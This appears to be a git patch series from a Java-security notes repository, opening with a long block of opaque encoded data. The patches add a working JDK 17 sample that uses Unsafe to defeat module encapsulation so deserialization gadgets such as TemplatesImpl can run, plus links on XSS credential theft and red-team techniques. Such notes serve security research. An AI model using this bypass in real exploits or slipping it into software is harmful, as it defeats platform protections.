zO6Aa;t?&o2(%~TIBNbU0+w5AWP&v_Ddy~Y;6042A56acWn4h{(TpGe782f^UVU&>PjFU@`yTyxE zlr*Pu=d0HO?v4UV3PNH{Y2GAwO4CMvIDNY#yiPU`TJ_BSc2!?K0LW&a& z1*(RFh+>%e&$-jH{4$ddw9O|=z_4c)frv!h`$-qJYU>hT)n-^zlA#b>F@3RAlxPB~ z4x;l)e__^1zHb!X942l~J80;ae?Q0_=eXqIbB&XiQjP!y2UZ06pkl#OV6?-zHlK~f zwV|K1)-?-g0z9&0ojYr7a{!e69o_0N=oTJF6X=%kULFfRfrY3~R68ZP6cWIVgF*sZLe!Ep6nPcp^tUjwZ7h$Tl7rNqj>)Y_@TVx1EZ9_v%*G(S zZ$u2IpF1$R(yOEUx6S_M_P2f1)`cBy^_3_WSBjiUn(+7f;0Pl7UIpJ3#xeB3_6^viL2&%9vtH@|TsM*djs9&_GweW}WM$b{g`f}to zgJU#_>TJ{%;;IVtVso1_H~QLi;Sn;W^D+pmcfFuWS4G8NlG|Qz`&WM{>W1nt1i5Q7 z6GTnYq!j>9PpM4VnXVq@80*aZc>bvNL1(xsvRrQ)0iZjfqIXyInVl>3G1j6j7W zPQ{iZ+V+hjEf=*meafm2X)eeuYt>g}$V03H)1~S3vo*^E#t@nXP{-=G5Oz z^i0S+^BW&?9rT7zNDajoS0DP!8V*Q3AR@3s2DYUC5hn@md+sN+!B5-Dhn zx^Z>pCXFf+*)LS#FV@Tr8Aim~2Wdy&C1qReIbb)=lSWm9waI=gJZyHX`#2e1TYZW| z8KGNM&30{=U0mE~ntrt|$3UzvY?N=;Weg%iX6!y4EGX@jSNB}wxaU?w)YA0dTJa2JhJwDLsO`kRj(%$&iI zWY4ikPW$d_Ku!+N{KEU)@WRvrPgIHvj!`4eSPFnv~E9q5r4me6wdo14;`0d_c~L2m?-` zKj}UGuw5+$vZ&TB>G7~=o8aQ|obXzQ?Bj)mSHh$Vq0XGOpXa7rH86h$!e%qLjk&zL z{N3lb{@s?{r#jc+Mx_&ve-ceKG4K%s5&w?CYaYYT@?t|4%X7oUlXnbszEHXtje+vn z`uM|h`kJR*p=XYpvWno!)|%@anxXh4H!r8J))xG9oFJ$rq}Caw=0B~YGT=Y0 z!_3o_8RND0(%wO7$p267;P=7I*=aQBakOgR5%g`n#lL}Qa!cN1|Mn1`pDL@&*Lqpq zTIMfujdL8Ud1IuMDn7;EF>mlVRmQ*!z$zLk#Y*+7Jb^dL@xAD)orA9H6GiDhn{+}e!9=bE)q?>VE|MzCjK6@yalv(ZP?NKzlK3*UjkwM%!UK zwhHh!)uie$-+E$`Ju#$EmNi<^WVm5t#b6WXC4ms=KRCS*XE 
z``2{~sJ3)Z&NXC}bGvQ28Cx?pi~TI>eYq*sc*%*^YES`+xL%KELYIi!A&bl{yxb zm89Lu!k~pI?&>IB@%X>_#(C4c2eAeJ!W$|#cQYFW%OCGjGD*8MTlh~s_|W(VBcc4> z9iHPT&~Bo-?cr`WVwK}z4Y0!O-Qm6SF+#?}fOnH@REOj~r1HseD0O@cJV-U%bCma~ z<0Te7V^3YrKq|sqs(!DPddnjzZ2Z7~;X?HJSq#O@flRqJ7->1NoY9N|%h-6lT)1hX zF+zA>b>p3u76Kk#tF@CpP;mcumw@eyiakqA8uDA*ys70V`1|Ijm`~9@M-%IB-pXcj z@n_LWoH#y~#2A>s0RAtkQaKH7ZkcPmtp89-?-g_-4gGc{R?v95*!-thh#LWT@Wf7e zlO%()&&S&8sKR4@L8$o~olKQK`^~5x#eeo&z0Y%Vo%ub$v38$*G6v5b3rq5i*o7B!zxRv4d=emUab%s7=DFrx-`;Ql^bkE?fe7*mjCH*1QE4FJEZ(<`5N3IF!t z$=?*9jScyg;O-yIw)Dwf(cjEImt~SW$FNWAXnc4(`Uk0cq_i;!qJFY5g8txKN7Gax~AfUkbSBRf!&oEH8*S?+BHM26sZka6C} zqq~eK99frfl~oP6;ss@pq}w`f_BmDCti{kK1$C{n^DHaR#E5M(Jt02lWkZF3YNjc~ z!D?Q3t5FB+l$Zd9q4bOVqAfI$N-B4oWKne2`)$F^&ArE6TzocJSbW!+5aR%MT2E{; zT&Tv%kD_%m!)j7}Q1;+@3afWLi!N|<)1my-+!nJqBRaeyw#WNKGTz+!$K(L!RURLq z6T|GSBDndg?b4Bv5Hd>OoCuj%aK70hc)$Pq0b}O_6ptNR+-*P&s=c|5u@e{z^p5F% zij}d$FD}SQ^(nB^p>&hWf|lJVs~6^AY?r|-IhN})r(o3tSq%9mWuH`h=7uOK`QS1Y zk25njfx`Z^IL1H8JT*GmSUJHUpn#t`o@4TE`>Vy%ZzbZ?=8DgVcsI97#9S76)n7Y` z#?NhX?c^vwH4#-0-toS;&os!YsPLZ~vp7%O#|&K>+n z?n6ildfVhbCR~%q3qhOHG+<53)excMwRbE0B4qYZEfA`ARSVJ`4B+tXPic-n~ z=9J`?l+f;;a&+Spo2C1q>*=8A{)iS;haJK_l$vX;A^LnI;p?eVAk;RNE+7!m@@ybP zCE+@tBpP3FVfw(d^U$Cl)TY0wcAfdMJl-zYO26}K zrm7lzvn@-lGfHljc@4Q*M#d8B)0IN8EQM*biRzzIkdy9_bfsc${RO6Ey~*413zX5$ z^I{0VV*S}og~!TI!Z!BV=z}#UIV%epwNt?xD%6Ri6}h>NSafFfAJypgf+-V7+)^aR*^1b&rKo17P#M>=7LRRb$xkdp{7yXt4Ixw8bZAzS zRvPiK#&{xejn5I7Ex9x_9XyPDojgCzJ8ep@JRRI#D0<7O=V-KJvA5SUw#}4wpX~SP zhVDb+u<=Y}@K)ENs@x>MCw-gq>*h($D(KX*rRCvid-&7vV7m-}wYn9Q1S_mWS}6BU zaX)Bd4OicD>zjV%e(65&#vhKN`5~1?z;|ltaiga$}>mC z+ySJj9DTy`G6o@4Qw8Ze7eXZt!i8p}dJ9JQEpV2#QN-NhDVYUk(Nl!bT7XiP%J6;h zLCb*>4Mof0OtBEw&vp<0&DJpVSzc8{$-q@1AIBJNB?(Uz8Jlon6e$p%_TVbTk ziVC|lZ8UA$DQO*W>}g=oiChvfi!hY3pk$o!8rNE*I!#(orA6Wz&YrCvtkQd?-cI_I zniSOrGa{^*7(&nVv<07+v0EJ3=D}78vfFp8lRV`x8#66G0qeN_2HU@V{pYVxE0cC6 zzHed&np6lx&~=TAoAm(kSogTZ*jS3)Cqr6^>&vm7pfR1Fby0~iZ)vsalLjLgaS|Ea zHi~wnX#2tEi5PQIra9Yoh0a^r;AL5>0|noCB(z=W8wM&0p%`IVNGnu5_@%FY=DTc& 
z^O&RNmw^@ErnZ{Clm8(v&~1e!Y#`+s?0gP%1tPU*a(Jip;+v_FAjak8}+8$8ln394>ZnHR+R0%c5LnV`t-#tSM)2;@Ixt%-0-D{zy zoG@tYC;x$Z*8pA0v2l{8H7RfkhY3M<@vX04hKB7iNm*K93W3~@$Cvp{5nVB8{+tCcm$IISp+3s{flNKu0_ra*%l;twnB37!9y#}{j~$i4MZ z^!d3h%*if?-nx=uOsqD~*4E-HAa-Z4Qni)FNeRHE+}fOm|GchgaSkU*;C_ebMq|9uAWMXlJ01YhRx98Mb5CWTa; zGj|`iGxi6z`w^oy8(wwnjVYcJo}nUy!iF}>2&WaN+UA6IrerWx{PsGEOd^!^eh8%x z#Ejz~j{hj@xV?nsw#hywTx|X%XftFW5kFDLa@Ckm*0tl*Sz`scr!H*kuN=pRcIAc0 zd=!Y?N{!1MPm4w?vRzo zxHWxD<29Yk~f7l|BfwZ!t)yTgQg1y!epK-R&b!=&dQn2*CJ=}mp z>*v}LqhLBcskj}$UcyLq98!AsHs<2+M@X^_q^kmjjg?>;Qz^81(BrXn&Hk^M%k24B z!E{IVAwhKO;apO6?RW#RvW$>KGqGYhJ9~0wOu3N#E#;W3zG_ldmH@pB2A6Zm3=nBdJ9+cl|b3%9M zdcj1ZwiAE~%&s5Zack~%l*WRtO+Y3ZiRU;%jBwuzOjoQm^v3LIZmM4YV;NG_`6!aZ zrwYT}buyY?xI_L(4PY3%kL%7STS^7%tTAwF0m00{`1YGT+bW^$no3`$*y%zQw`Rhb zbNh_X_7H9+;gVmxM!9MDU&strQ%Z>buLxHqnG!pB8umUT{pq3fpO0?01~y_7`9J7j z{e}oI>6FoRq}GO-r>Wjv&IPS6iRwX%v09DI_|viI?NFextr4`R2X;6al-98IhDwPa z1^5SkLoD(1N;-2X8Y(Krce8X@(I7!Yx)fT1P^#3(>mT^&a z?HX4MRFsk$7(hCtyHTW(ZiZ008);BPB!(VpK#)d2kfDcC8io`EhVG#R3F$a{^nKp* zp7Z6L`7)pOZ?CoX+I!vib^Y(P7(zchJKhF2(oD1A_Od;Gr+7TcNo<=&2&9!Vw_AZF z-JPY7qTIHzgwL@Da&O_6uK6y7n3$ZLT%B=QXxs2H6s4jFEc*8 zH4?&f7Y%-NqZ1B|5E|Fa6%H=}x-4Ahwsc!~k+Re-@2o-Gz~Q3C-~xnfo>JF;%i_yP zxoZoiPMV0OhyZ0EIR~kP`KWb_B)UYSedtXlQ&b^vszXHbb&sr^g!NJb&-Y6q2l)?U z0SIhqp1o6WJkz&6jOY}8Y}72}T88Mk*TMBX@DrXtU5k?6@B@Oh{tZt7UAfAYatDBc zVJHKkuC*_*yZzXf_%SR-7WDZ+o`Vy6+Yf zh#3VIh0W_q#uralj_M7zWFm`;BBAtl?G}{Ens>_*h?OHroZEGD^6%(Z;Bi|0Bw3Ps z%EitL)osK*CI31-%Srpu z;!89vu<(>tcw-Sz?MvQQY@6JFZy70delyS{T|+$}$woe43q1MMEAo~?aTp!wqd<%4 za7zym0!fWlWfktw-zXS z`R6kF>6N;XVFmVzh)|C7i`Qi@w^kD5GI4t2EYZd#S_-;d&nYG0ic^fCc0B-+Z*MnlaWRP^5-T1Qo_|Dm&h|`A6TaeNDRKDqt#= zm{rAK;g6OielAHvVa{{Sumxrlcak)HiL+^7x{|*i zj4%VHT`&nOvP>tjnmr)l!ab;&4C}^GxvtO`{(2JDP1FEZb6-`)Fk;T928aCn-!Tw= z=@rO<6i^*inn-t5t2QwdchjF&e;I58;8oEEl%r|TA z^VxctN4oFE`FhHXgz!1nvA77h2+?!oc4_wlw`6u2wH<#1Wh1fs!&J@>>lNbFk02abEf=& z$2IVyw!%KK=XxWjYy|PbSr$jGLycV<504C%`!PPN6Adx$H2(UyG>SjclFWoG-z}QA 
zDb=}kp>#|sKGyxD)!N|spr96frfKx}$%szSRT~TS?KQvctdW=WeuAd7$GsASC!+k@ z(Z{cU19VQC^G4sNwYv(oe*DKmS}V=6!FssyndUZeGt3)Ox{-`ZqNkZ!0=hPbW(^aG zYl#jgi!UD24l|K}tmU&T1|9TybLg11uNDc_ArG?6=3P;>5dzzodi7)+c8QZ`LBI0Q zK~00dCI$IU$9}EPNbK7aD&YioY1$9a%KM#q=qSa}#Nz_hCKDP;;{uDRMA50kei7Y+ zDhIWV-G+uZb3%ubwGj>dCTp$0JiORAQ|!IrdB4=cezbq}R9Eqdr6a*07>`~BeYRXq z6Fh#PLwWSG34R;V=Q!!n2SjA^x$MZiM=B}nE+@?TwMMU;Mxs1F1P8t(@0v@BGaHSStS zo@^vWJ!;EM0hPM63e$lHfM`hQD^%xsGi8qM4oCX3Y6X^g8F{{OWWQD&T}xy2X!nsFUFbHi>3wCW8l4p~)JnynUP1vPhWA7;on0YXh}~t;;ntK^ zU~97ZX3N)DnvDFes{GEt2YnNci~QUHnVpqpi-^)?nD)3}&7mYLq0DU#pK{PJrj1>D zU@0_UiqFxmSv%=5&gL3{g!ANg%^HDZeqNmDGaAbR%w26VT7aGcPD^-fJQRJl;6C_r zZCY(}Yay>JkZOIibk%)ush|(==o+6W6h)+fS2%=G{u0&OJ9*-&9^(sLc3vV|j4V%? z@g)att^^Dvh1~H2kcaQJ@Sl_R@1MkKwf|mTY?_I$43wG$|uLwIj_zg#H z0Q6x@Xxe~Y29W0sR2y&G)vQ;h#Mr3>hpBp2pNBdeod+sQ+y0gul=gxhjY)J$dqXe@ zfirK8o+bwbSeuE*nhKn9T#<*_a#qtXL)rR}jJeRQ#ZL?VK3fjldA|)4*lhUh@h*a1 z9qd@x99M$j*W{9m?vL^i+OCRgAqL?Tcj230bG5YOc#=2)Qj_;*Q}2B?wnrL=4(-4D zE^4`+z}KcAJ?}8-CukVdauQ8mc$xXuh2{5mYM-zYAVoTq3b{JIKC3o@I%{shPz_4= zbuQuhKoAFeBHYa-4E0joxi!txzdkUwi@lJkCF8~0%`Zo7RYFR@Tdk$E_T9QZPmv0Tjrp|YyTHy#|F#<)uh zCyJqnoz@S|QIBm7F>|3yxC1M{XDzyFn<FZG!i~yOhcTuLJ%a%3IUT)hcsOn-vjFuH{C9wYbHz zfW`E=Aqw~PotLy6lZBfZE71TNbz^Egg&%w`WG*~ZoT4{{OWik-1%&?;_b)UXhGWTl zDfz11sKGYUu$ZlKpkI!x7GyX-rI`OmTNi8anUw&bR1^yaCmh<8OfgCkBl}AbC$aDt z4eP}G01aeND3n~17?~r@XwGB5M5sv6(t9)%RDG);i_NBA+S{?@apkTk3Ntnil?hGr zw}eTbCuDuN6n|9;cz(xR!(OBT%gSW_ybNH{%S6R`=w27=WH9*SR6|zTB`vY|l}RSe zU3wN%WpDvXEz`2yF_-_=#CIrx#}>^h^oRU6J8Q$J@o&l2h^j1(p0#}Ek>u^%-l_<| z66lSp+j>-3<9Fi+4Z-Yzrw~NUqa8}|Ait;nnwHbLo5%c=Y|_-*hJD*&j-$Fd!q^;B z8vac}wI9{vZ>LJLz5!@fZRMv@@PO(HS!*q?zi$K*Q_{8x^5WTkp9oMigfv2i?(*^v zhtvq)&|aI2 zwyjEJ%$|~}Z~^2oU(0WtZ?P3Me0}TWK{9vlnv4v4-j$1gG9F*GTn0lriB(wkiaI9l zwy@`cxafL%n$Hs{ zy9*SCzdUUl78vt@YQP5#z6%JjeR`-X=!LVE5ZeBSvwbTDXGELYdwNPZBDRly4X#gL zuxle=Rr&Gz5)y#T@r3Za-l;o>5JLItOaAm=F&N|OcZv2)Haoys5da6GGlTKWD`x!x zuV;}lBe+mBaI$&ToHS`GpNX(NvQMBuu~1Ak8gW$VB^IdH4wTr4I$)^@a9n&61+VTi 
zw;o%2unC({oi^9_1ikMYCuAiwr%OYyqb4j@l*^U7CcRKw%wqmKTv)@wfx}WJ&%>r|#C`MWu^d?q^ExgDdO)&Ijk0i!G^X=*cxlzE&be*kVq*ntOH$ zKkW0N8-WW^0!d_)r?adJq43RCUE?*>fYyXoYNCHjw_#JaE03J~dW|Z}xEHmq?#X=3 z7TzpS2V3CKJ>Inzw0*qyg(;n%Ga|ISg2IYd>cX0nTRK5Yb{A)s1k-G9J&{pn3Ka1k zwlhC4jeU>Cdm8sPz{P)oD{jb>f>@i~MW_>n%xD&Q32?UlL9J(c2RXj81}IG&RR$W| zyya1AMv!6rkZw|)z4KRk6q>pifO0@WE?a~@holmqr4*aOo&C=c=AWBb)6=VpIz@Z* z3K*%ZQXPCJQA7O7FsQ0AF(R=@zqdMmMB-{obC%^yUc_3@w)kFTNJgAwTDfCy;ilMO z;5Vf+ClLdie!KSSs-xPy0RPmnU{Kel8&!?$ka2kh57~IK`R|;>@xL4ZFipNu(H?R#OI@&p zMOV`-4O6YjG1XaGI1)t{s09xobyV-wRJ_x)bwB^|5nIq)r)_{fYAlCp(TDb*Xf}6- zRefNKP8t3#8`?^rLN3<%32iTQZ2yT(vY+bVt%4g%D}LDOY8)$0#=-i6eZh)+psp97 zM{xS9ZaT(a&t|ipNk^L&1(5Bl;x0S2)NgRS;g$SYmlsOhWp|xexuRY#!i5T=tiHd$ ze^{;Ji0Kbbfl&l^L_+r#2o{qV`kqr^E*E#@$0o@=Vj4SJE`zB6Yp~^IuFdEda;5BJ z?f{=~!23AA{IwJt2PKMkyZBvs;B+i0y@l>ajc+C*lT74Kf-gAA!IA^QHDvZGrpll9 zQlmIU^Y)!ARMw07lbc%y%h-#G?PY0^o7#>tBLV`dsCqUirM_laSpD{=tXfW0Om%+l zffZ2Q*b=GxK4V6Ui zcgek}EM4|_`@*wvOS2MUg|DkA^zIb9WOukcMWN16i zQOvDXHGM_sh^mvc0FN(GwdqcuMXkutjV6elmRa-`~fEx5$#Ruo`k6& zrlOvSVHqQufdlZPo1ysB+14LZo~mz%>3QT_6U6{Go36_DgM{3Xo;#D1FS|^5D>*BW zUe_L9*eoZ4+8%ZLaa>l+`VhQjSa}UXsalaQBNW}!?*bL`Y>Lx*f0{efjmMP@E42{K@@6XWrvE2X*-h8#SS<1ta|MI(1^ZAg6VT&nxN{a$AO-h-BQ zgAP1Lw9&vP9fNpLjgoG+OQ4syuwff6Vqc;TPY<8<$;LvFG4P6dcRCau{kk@%U$1)igNS|6G2u zA999>c;?SGl_Hlc$2M5cJ;)Ztp>4|H^%vfA;1rzAIG~XBDgw;U{86^$SZqT3sI~m6IJ2SmwYlPLIJ7P9<6g2_H^e zo+FHTaqxedKu5T|g%E4l)V3rjboItn45Jcjv zJS%O1^9fK%XJ_$%NpWIXnF=w>&g~EsIP+X@ccbn}5+~N=QAbGl->i)kKWW0Km8ApU zR}cq!ViBK-ENaG{=qAq7>x^Sz+}Hl`Y!bCYwtfDej!k^GV5G6!YgrC52AWuw0xd`| zynraSt3QP-f?j_(N1W>0wq8>5Irp4C1KrfQWjZY}LQqn4sm@i1>mIf~Z+{3`&Q?JO zohNhqKW&_Qa2X%m1%NO6(LD5hc@OFwYPCoDy%vyXPQ}MeSE&~igCK~ED0l%=5F|#< zFgd!PDf#QLZ9H@oVxN*A^`2FR4w7(=Fyx48mWdlCOkABn`}*c zbxt|f1Of0#+}-9cJXp%KPBJyB&CSY%5=$5h1A%2U+iWqCaX3jYw6Iz}Kknx$iuvy~ z*v%qBP8JXa3|Qjs#Y@&mJXP)fetWW74yD#!1;$`s*RR^{CctSJOcN`rvp4HFFjjfBeV=<;T5>CFR* z^2gp|Z%f#=WY^vJdZkY4`d`Q=UvLb1`|VdFo zW;Shz2Nd7Tzp`X<`qR5V&diQWJXfc&VVK|ddvO?GYLi>; 
zCOuW(?PwxN8n1a;UYcJ$p!%23#2S@0lFs|5?QYQUUTnGkP#BScFM9RP=X{H=VwrHY zN30}m^{f)mzxVmu|5C=#Ha9jbi6q{)^7{<5C1CP8QNdPJz}fVL_nt|CG*6~vmcX=^ zL;bYJO|dE4e^)U7no%&r{Dnyodpr3SVxqbY^cv3q?er}Lem7_I%5&(GrRLk#esEC= z9M-}=I>ArAeWHJj`#*mOfEQL#Bh~#AJG(ApH=_`ye!T>)%79`E<+eftw9BtEtMd_u z;L~S_^5Sn&L6>HA>-s(ZMH$tCd2&b@EXtYovP4E5&!=jm*=wo1F@)(`9X`Mr0RV0G zpS=~K1MW6prN&gijGLDEjy?Sb&$o7mj8AiK#=Abd?V*J#|9AWD$u Date: Wed, 21 Dec 2022 16:15:35 +0800 Subject: [PATCH 224/332] Update Readme.md --- Jdk/Readme.md | 104 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index fd5b9b0..7c4acd2 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md 
@@ -64,3 +64,107 @@ public class bypass { } ``` 参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +jdk>16 + +jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + + +![image](https://user-images.githubusercontent.com/63966847/208854101-cfe0eee9-5882-4450-9d82-7092d353e30c.png) + +限制了 + +![image](https://user-images.githubusercontent.com/63966847/208854137-7c56007c-ac54-4490-8f30-2753cc0e52e3.png) + + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object 
targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 63b0ceabd7324ce197f5b7ab3ca1b6b60952fa7e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 12:40:21 +0800 Subject: [PATCH 225/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3aa154..22a163a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
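Review bot: In the `Jdk/Readme.md` hunk, the `for` loop in `bypassModule` writes every target module into the same `module` field of `currentClass`, so each iteration overwrites the previous one and only the module of the last list entry (`TemplatesImpl` in `main`) is left in place; the `java.lang.reflect.Field` and `java.lang.reflect.Method` entries added in `main` have no lasting effect, and the README should either say that or drop them. The inner `catch (Exception e) { }` is empty, so a failed `getDeclaredField("module")` or `getAndSetObject` call goes unreported and any later failure is hard to trace; log or rethrow there. The section also states only `jdk>16` and never names the JDK build the sample was run on, and the sample uses raw `ArrayList` and `Class` types plus the deprecated `newInstance()`.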
@@ -218,3 +218,5 @@ + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** ++ 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) ++ 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** From 2c555b4d7fddc1d2e7574a28197127df62a66be6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 13:53:25 +0800 Subject: [PATCH 226/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 22a163a..4ca5bb7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -220,3 +220,4 @@ + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** ++ 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** From 2281f68f8c506e035b182a1d1879b266d5ddb770 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 19:59:39 +0800 Subject: [PATCH 227/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4ca5bb7..e763ad3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
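Review bot: The `mp.weixin.qq.com` link added in this `java日常/Readme.md` hunk carries the query parameters `mpshare`, `scene`, `srcid`, `sharer_sharetime` and `sharer_shareid`, which describe the share event rather than the article; trim the URL to the parameters that identify the article (`__biz`, `mid`, `idx`, `sn`) before committing.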
@@ -221,3 +221,4 @@ + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** ++ 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From b90b5259a380a49f15aadf28ea88da6f73c028f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 21:39:48 +0800 Subject: [PATCH 228/332] Update Readme.md 